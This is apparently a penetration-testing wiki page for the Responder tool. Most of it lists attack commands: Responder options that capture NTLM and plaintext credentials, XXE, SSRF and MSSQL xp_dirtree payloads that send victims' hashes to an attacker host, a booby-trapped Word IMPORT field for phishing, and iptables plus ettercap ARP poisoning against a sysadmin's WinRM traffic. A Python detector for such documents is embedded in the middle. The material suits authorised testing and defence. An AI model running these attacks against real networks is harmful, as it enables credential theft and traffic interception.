Responder Common Attacks:
Basic usage:
Redirect workstations to Responder HTTP authentication server and grab NTLM credentials:
./Responder.py -I wlp2s0 -rF
Redirect workstations to Responder HTTP authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
./Responder.py -I wlp2s0 -rb
Redirect workstations to Responder HTTP Proxy authentication server and grab NTLM credentials:
./Responder.py -I wlp2s0 -rP
Redirect workstations to Responder HTTP Proxy authentication server and grab plaintext credentials (this sends a login popup on the victim's workstation):
./Responder.py -I wlp2s0 -rPb
Redirect workstations to Responder HTTP WPAD proxy and intercept web traffic (Responder will also inject an SMB UNC path to grab credentials transparently):
./Responder.py -I wlp2s0 -rw
Redirect workstations to Responder HTTP WPAD proxy, intercept web traffic and force NTLM authentication:
./Responder.py -I wlp2s0 -rwF
Redirect workstations to another IP instead of Responder's own:
./Responder.py -I wlp2s0 -re 10.0.0.234
More Advanced attacks
Responder can be used as a poisoner, but it can also act as a set of rogue servers when combined with other attacks; these attacks are documented below.
External Pentest
Responder can be used on an external pentest in the following situations:
- XXE:
Set your XXE payload this way:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://Responder-External-IP/test"> ]>
Watch for any HTTP hashes coming in on your Responder shell.
Another option is to use a UNC path instead (less reliable, since outbound SMB is often blocked):
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://Responder-External-IP/test"> ]>
- MSSQL SQLi:
SQL injection on MSSQL can lead to an NTLMv1/2 hash grab:
xp_dirtree '\\RESPONDER-IP\share';
xp_fileexist '\\RESPONDER-IP\file';
- SSRF:
Point your SSRF payload to Responder:
http://Responder-External-IP/123.html
- Phishing:
Create a Word document and open it:
Press CTRL + F9, type IMPORT "\\\\Responder-IP\\123.jpg", right-click and select "Edit Field", tick "Data not stored in document", then save and close.
When the victim opens the document, an SMB request will be issued to Responder-IP.
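A defender-side check for the document technique above, added here as an example (it is not part of Responder or this wiki): it parses WordprocessingML field codes and flags fields whose first argument is a UNC path or URL, which is exactly what an IMPORT/INCLUDEPICTURE field pointing at a rogue SMB server looks like inside the .docx. The sample document.xml is constructed, and the 192.0.2.10 address is a documentation placeholder.

```python
import re
import zipfile
from xml.etree import ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
# Field types whose first argument is a path/URL that Word fetches on open/update.
REMOTE_FETCH_FIELDS = {"IMPORT", "INCLUDEPICTURE", "INCLUDETEXT", "LINK", "DDEAUTO", "DDE"}
FIELD_RE = re.compile(r'^\s*([A-Z]+)\s+"?([^"\s]+)')

# Constructed sample document.xml mirroring the IMPORT field above (field codes escape backslashes, so \\ becomes \\\\).
SAMPLE_DOCUMENT_XML = r"""<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>
<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> IMPORT "\\\\192.0.2.10\\123.jpg" \d </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>
</w:body></w:document>"""


def _field_codes(root):
    """Yield each complex field code: the joined w:instrText runs between a 'begin' fldChar and the next 'separate'/'end'."""
    buf, collecting = [], False
    for el in root.iter():
        if el.tag == W + "fldChar":
            if el.get(W + "fldCharType") == "begin":
                buf, collecting = [], True
            elif collecting:
                yield "".join(buf)
                collecting = False
        elif collecting and el.tag == W + "instrText":
            buf.append(el.text or "")


def find_remote_fields(part_xml):
    """Return (keyword, target) for every field that pulls data from a UNC path or URL."""
    hits = []
    for code in _field_codes(ET.fromstring(part_xml)):
        m = FIELD_RE.match(code)
        if not m or m.group(1) not in REMOTE_FETCH_FIELDS:
            continue
        target = m.group(2).replace("\\\\", "\\")  # undo field-code escaping
        if target.startswith("\\\\") or re.match(r"(?i)^(https?|file)://", target):
            hits.append((m.group(1), target))
    return hits


def scan_docx(path):
    """Scan the body, headers and footers of a .docx and return all remote-fetching fields."""
    hits = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if re.fullmatch(r"word/(document|header\d*|footer\d*)\.xml", name):
                hits += find_remote_fields(zf.read(name))
    return hits
```

A hit on a UNC target is a strong indicator that opening the file will trigger an outbound SMB authentication, so such documents are worth quarantining at the mail gateway or flagging in a sandbox.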
Internal Pentest
Responder can be used as a rogue authentication server toolkit when combined with ARP poisoning.
Let's take the example where you know that a sysadmin workstation is located at IP 192.168.0.153 and that this sysadmin uses WinRM to administer servers remotely.
Sysadmin workstation:
192.168.0.153
Switch IP:
192.168.0.254
Let's set up an ARP poisoning attack with a PREROUTING DNAT rule, and redirect the sysadmin workstation to our rogue WinRM server:
# Drop all outgoing ICMP from this host
iptables -A OUTPUT -p icmp -j DROP
# Rewrite the destination of every packet to TCP 5986 so it goes to your IP instead of the original server
iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986
# Enable IP forwarding so the rest of the workstation's traffic still flows and nothing is disrupted
echo 1 > /proc/sys/net/ipv4/ip_forward
# Launch the targeted ARP poisoning between the switch (192.168.0.254) and the sysadmin workstation (192.168.0.153)
ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153//